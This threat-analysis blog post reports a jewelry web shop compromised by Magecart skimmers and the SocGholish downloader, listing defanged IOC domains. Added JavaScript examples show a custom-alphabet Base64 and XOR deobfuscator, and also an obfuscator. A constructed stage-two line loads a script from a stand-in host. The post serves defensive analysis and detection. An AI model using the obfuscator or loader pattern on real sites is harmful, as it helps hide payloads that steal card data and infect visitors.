Threat Walkthroughs – ThreatDown by Malwarebytes
Web shop spreads SocGolish malware and steals credit cards
Pieter Arntz · 2025-01-15 · via Threat Walkthroughs – ThreatDown by Malwarebytes

A web shop selling jewelry was found with code belonging to two web skimmers and the SocGolish Trojan downloader.

Something that people often overlook when they think about malware is that a vulnerable machine doesn’t stop being vulnerable after it’s been infected, and so it may be compromised in more than one way.

We recently found an example of this while visiting a US jewelry website—we noticed a couple of alerts about blocked domains that triggered our interest because they were completely unrelated to each other, suggesting multiple infections. (We have reached out to the websites affected in this story.)

We recognized one as a SocGholish middleware domain and the other as a Magecart credit card skimmer. Not a nice combo to present your customers with, if you ask me.

Let’s dig in.

This is the malicious traffic our research revealed:

Figure: Malicious traffic from one web store, showing requests to two credit card skimmers and to SocGholish.

The domain javalibraryeuro[.]com has been on our radar since October 2024, for acting as a command and control (C2) server for a Magecart campaign.

Magecart is the umbrella name for a number of notorious cybercriminal groups known for credit card skimming attacks on e-commerce websites. Their main technique is to inject malicious JavaScript into the checkout pages of targeted websites, often by compromising a third-party script or service the sites load.

The domain tapisroulantstore[.]it is a legitimate site, but the JavaScript hosted there does not even try to hide what it does:

Figure: Credit card skimmer code hosted on tapisroulantstore[.]it.

SocGholish

While falling victim to credit card skimmers is bad enough on its own, getting your system infected with SocGholish is another level of dangerous.

SocGholish is a sophisticated JavaScript malware framework that has been actively used by cybercriminals since at least 2017. It tricks users into running a script that is supposedly a browser update. What it actually does is infect the machine and report details back to a human operator, who decides how best to monetize the access.

Figure: A typical SocGholish lure, a fake browser update prompt used to get people to install malware.

In this case, SocGholish is not hosted directly on the website; it takes a few hops to reach the actual malicious code. In the traffic analysis you can see that the script monsterpword[.]com/assets/table.js is loaded, which in turn loads another script from yet another URL, dashnex.plexusmarket[.]fund, a domain we have been blocking since November 2024.

Figure: JavaScript on monsterpword[.]com that loads another malicious JavaScript file.

The script from dashnex.plexusmarket[.]fund is highly obfuscated, but after a cleanup it looks like this:

Figure: Cleaned-up SocGholish code from dashnex.plexusmarket[.]fund.

The decodeBase64 function decodes a Base64-encoded string. Rather than calling the browser's built-in atob, it carries its own character set, maps each character to its index in that set, and reassembles the original bytes from the resulting 6-bit values. Carrying the alphabet in the script is what lets an obfuscator use a non-standard character set, so when you analyze a sample, decode it with the alphabet taken from the sample rather than assuming standard Base64.

The processData function takes the decoded data and a key, then XORs them character by character, with the key repeated across the data. Because XOR is its own inverse, the same routine both encrypts and decrypts.
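To show the two building blocks working together, here is an added example written for this page; it is not the SocGholish sample's own code. The shuffled alphabet, the key "k3y" and the stage-two string are constructed for illustration and stand in for whatever the real script carries. The encoder is included only so that a payload can be built and unwrapped offline.

```javascript
// Added example (not from the SocGholish sample): a Base64 decoder driven by an
// explicit character set, the matching encoder, and a repeating-key XOR.
// ALPHABET, KEY and STAGE below are constructed; replace ALPHABET with the
// character set lifted from a real sample when deobfuscating one.
const ALPHABET = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210-_";
const INDEX = new Map([...ALPHABET].map((ch, i) => [ch, i]));

// Map each character to its 6-bit index in ALPHABET and repack into bytes.
function decodeBase64(text) {
  const clean = text.replace(/[\s=]/g, "");
  const out = [];
  let acc = 0, nbits = 0;
  for (const ch of clean) {
    const v = INDEX.get(ch);
    if (v === undefined) throw new Error(`character ${JSON.stringify(ch)} not in alphabet`);
    acc = ((acc << 6) | v) & 0xffff; // at most 13 live bits; mask keeps acc small
    nbits += 6;
    if (nbits >= 8) {
      nbits -= 8;
      out.push((acc >> nbits) & 0xff);
    }
  }
  return Uint8Array.from(out); // trailing partial bits are padding, dropped
}

// Inverse of decodeBase64, used here to build a test payload.
function encodeBase64(bytes) {
  let out = "";
  let acc = 0, nbits = 0;
  for (const b of bytes) {
    acc = ((acc << 8) | b) & 0xffff;
    nbits += 8;
    while (nbits >= 6) {
      nbits -= 6;
      out += ALPHABET[(acc >> nbits) & 0x3f];
    }
  }
  if (nbits > 0) out += ALPHABET[(acc << (6 - nbits)) & 0x3f];
  while (out.length % 4 !== 0) out += "=";
  return out;
}

// XOR each byte with the key byte at the same position modulo key length.
// XOR is an involution, so one function both encrypts and decrypts.
function processData(bytes, key) {
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    out[i] = bytes[i] ^ key.charCodeAt(i % key.length);
  }
  return out;
}

// Order used by the post's description: undo the transport encoding, then XOR.
function deobfuscate(encoded, key) {
  return new TextDecoder().decode(processData(decodeBase64(encoded), key));
}

// Reverse direction, for building a payload to test against.
function obfuscate(plain, key) {
  return encodeBase64(processData(new TextEncoder().encode(plain), key));
}

const KEY = "k3y"; // constructed
const STAGE = "var s=document.createElement('script');s.src='https://example.test/next.js';document.head.appendChild(s);"; // constructed
const blob = obfuscate(STAGE, KEY);
console.log("obfuscated:", blob);
console.log("recovered :", deobfuscate(blob, KEY));
```

Because the alphabet is a parameter of the decoder, a sample that uses a shuffled character set will throw in atob or produce garbage; swapping in the string from the sample is the whole fix.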

Since SocGholish is basically a Trojan downloader, its human operator can use it to download whatever malware will best monetize the compromised machine. It could be used to download an information stealer, or, if the victim is deemed important enough, ransomware.

How a bit of shopping while using a company computer led to a full-blown ransomware attack is not something you want to have to explain to your boss or IT team.

IOCs

The malicious domains mentioned in this blog post are all blocked by ThreatDown and Malwarebytes web protection modules:

javalibraryeuro[.]com

monsterpword[.]com

dashnex.plexusmarket[.]fund
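As an added example that is not part of the post, the following script refangs the three IOC domains above and hunts for them in proxy log lines. The log format ("timestamp client method url status") and every line in the sample are constructed, including the shop hostname and request paths; only the three IOC domains come from the post. Matching is done on the URL host, exact or as a subdomain, never as a bare substring, so a look-alike such as notjavalibraryeuro.com is not a hit.

```javascript
// Added example (not from the post): match the post's IOC domains against
// constructed proxy log lines. Lines follow "timestamp client method url status".
const DEFANGED_IOCS = [
  "javalibraryeuro[.]com",
  "monsterpword[.]com",
  "dashnex.plexusmarket[.]fund",
];

// Turn "[.]" back into "." and normalise case.
function refang(ioc) {
  return ioc.replace(/\[\.\]/g, ".").toLowerCase();
}

// True when host is the IOC itself or a subdomain of it (never a substring).
function hostMatches(host, ioc) {
  return host === ioc || host.endsWith("." + ioc);
}

// Parse one log line; returns null for lines that do not fit the format.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 5) return null;
  const [ts, client, method, url, status] = parts;
  let host;
  try {
    host = new URL(url).hostname.toLowerCase();
  } catch {
    return null;
  }
  return { ts, client, method, url, status, host };
}

// Return every record whose host matches one of the IOCs, tagged with the IOC.
function findIocHits(lines, defangedIocs = DEFANGED_IOCS) {
  const iocs = defangedIocs.map(refang);
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const ioc = iocs.find((i) => hostMatches(rec.host, i));
    if (ioc) hits.push({ ...rec, ioc });
  }
  return hits;
}

// Constructed sample log (shop hostname and paths are made up).
const SAMPLE_LOG = [
  "2025-01-14T10:02:11Z 10.0.0.21 GET https://shop.example/checkout 200",
  "2025-01-14T10:02:12Z 10.0.0.21 GET https://javalibraryeuro.com/lib.js 200",
  "2025-01-14T10:02:13Z 10.0.0.21 GET https://monsterpword.com/assets/table.js 200",
  "2025-01-14T10:02:14Z 10.0.0.21 GET https://dashnex.plexusmarket.fund/ 200",
  "2025-01-14T10:02:15Z 10.0.0.21 GET https://notjavalibraryeuro.com/ 200",
  "2025-01-14T10:02:16Z 10.0.0.21 GET https://cdn.plexusmarket.fund/a.js 200",
  "not a log line",
];

for (const h of findIocHits(SAMPLE_LOG)) {
  console.log(`${h.ts} ${h.client} -> ${h.host} (IOC ${h.ioc})`);
}
```

Note that the third IOC is the full hostname dashnex.plexusmarket[.]fund, so a sibling such as cdn.plexusmarket.fund is deliberately not matched; if you decide to block the parent domain as well, add plexusmarket[.]fund to the list explicitly rather than loosening the matcher.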